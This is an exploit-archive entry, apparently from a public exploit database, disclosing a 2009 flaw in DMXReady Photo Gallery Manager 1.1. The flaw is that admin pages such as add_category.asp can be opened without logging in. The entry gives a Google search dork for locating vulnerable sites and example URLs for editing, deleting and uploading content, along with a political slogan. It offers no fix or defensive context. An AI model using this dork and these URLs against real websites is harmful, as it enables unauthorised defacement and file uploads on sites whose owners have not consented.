id: 4672
date: 01/14/2009
title: DMXReady Photo Gallery Manager <= 1.1 Contents Change Vulnerability
author: ajann
cves: 

===================================================================
DMXReady Photo Gallery Manager <= 1.1 Contents Change Vulnerability
===================================================================


*******************************************************************************
# Title   :  DMXReady Photo Gallery Manager <= 1.1 Remote Contents Change Vulnerability
# Author  :  "ajann" from Turkey
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  39.97 $
# Dork    :  inurl:inc_photogallerymanager.asp
# DorkEx  :
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_photogallerymanager.asp&btnG=Google%27da+Ara&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

# http://[target]/[path]/admin/PhotoGalleryManager/add_category.asp

Example: 
You Find -> http://[target]/[path]//applications/PhotoGalleryManager/inc_photogallerymanager.asp
Edit  ->    http://[target]/[path]//admin/PhotoGalleryManager/add_category.asp

 :)



#  0day.today [2023-03-27]  #